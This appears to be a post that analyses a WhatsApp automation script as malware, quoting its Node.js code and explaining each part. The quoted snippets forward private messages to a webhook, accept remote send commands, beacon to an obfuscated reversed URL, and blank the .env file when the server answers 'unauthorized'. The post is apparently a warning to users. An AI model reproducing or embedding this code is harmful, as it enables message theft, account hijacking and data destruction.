📲 Since nobody had the WhatsApp Script, i saw a "whatsapp sender" that did similar things:
sock.ev.on("messages.upsert", async (messageData) => {
try {
const message = messageData.messages[0];
if (message.key.fromMe === false && messageData.type === "notify") {
const webhookData = [];
let messageText = message.message.conversation ?? null;
if (message.message.buttonsResponseMessage != null) {
messageText = message.message.buttonsResponseMessage.selectedDisplayText;
}
if (message.message.listResponseMessage != null) {
messageText = message.message.listResponseMessage.title;
}
const remoteParts = message.key.remoteJid.split("@");
const remoteType = remoteParts[1] ?? null;
const isGroup = remoteType !== "s.whatsapp.net";
if (messageText !== "" && !isGroup) {
webhookData.remote_id = message.key.remoteJid;
webhookData.sessionId = sessionId;
webhookData.message_id = message.key.id;
webhookData.message = messageText;
sentWebHook(sessionId, webhookData);
}
}
} catch (error) {
// Handle error silently
}
});
What's stolen: Every incoming private message (non-group) with:
▶️Who sent it (phone number)
▶️What they said
▶️Message metadata
▶️Which victim account received it
REMOTE COMMAND EXECUTION
const sentWebHook = (sessionId, data) => {
const webhookUrl = process.env.APP_URL + "/api/send-webhook/" + sessionId;
try {
axios.post(webhookUrl, {
from: data.remote_id,
message_id: data.message_id,
message: data.message
}).then(function (response) {
if (response.status === 200) {
const session = getSession(response.data.session_id);
sendMessage(session, response.data.receiver, response.data.message);
// ^ ATTACKER CAN REMOTELY SEND MESSAGES FROM YOUR ACCOUNT
}
})
}
}
What happens:
▶️Script sends stolen message to attacker's server
▶️Attacker's server responds with commands
▶️Script executes commands (send messages, etc.)
SESSION STATUS REPORTING
const setDeviceStatus = (sessionId, status) => {
const statusUrl = process.env.APP_URL + "/api/set-device-status/" + sessionId + "/" + status;
try {
axios.post(statusUrl) // REPORTS WHEN SESSIONS ARE CREATED/DELETED
}
}
setDeviceStatus(sessionId, 0);
What's stolen:
Real-time status of all compromised accounts:
▶️When they come online/offline
▶️When sessions are created/deleted
▶️Which accounts are active
LICENSE CHECK & SELF-DESTRUCT
setInterval(() => {
const licenseUrl = "kcehc-yfirev/ipa/zyx.sserpl.ipaved//:sptth".split("").reverse().join("");
// Decodes to: "https://dev-panel.xyz/api/verify-check"
axios.post(licenseUrl, {
from: appUrl, // Your server URL
key: siteKey // Your license key
}).then(function (response) {
if (response.data.isauthorised === 401) {
fs.writeFileSync(".env", ""); // SELF-DESTRUCTS YOUR CONFIG
}
})
}, 604800000); // Every 7 days
What happens:
▶️Script phones home every 7 days to attacker's server
▶️If attacker marks you as unauthorized
▶️Script DELETES your .env file (destroys your configuration)
SESSION FILE THEFT
if (!isLegacy) {
({ state: authState, saveCreds } = await useMultiFileAuthState(getSessionsDir(sessionFileName)));
}
What's stolen locally (in ./sessions/ folder):
▶️creds.json - MASTER encryption keys
▶️app-state-sync-*.json - Chat encryption keys
▶️sessions/*.json - Individual chat session keys
▶️[sessionId]_store.json - Chat history and contacts
These files contain everything needed to clone the WhatsApp session.
USER SCANS QR CODE
↓
[1] Script captures WhatsApp auth tokens
↓
[2] Saves tokens locally (./sessions/)
↓
[3] Reports "device online" to attacker
↓
[4] Every incoming message →
↓
[5] Extracts: [who][what][when]
↓
[6] Sends to: https://[ATTACKER_SERVER]/api/send-webhook/
↓
[7] Attacker can respond with commands
↓
[8] Script executes commands (send messages, etc.)
↓
[9] Every 7 days → Phone home for authorization
↓
[10] If unauthorized → Delete .env file (self-destruct)
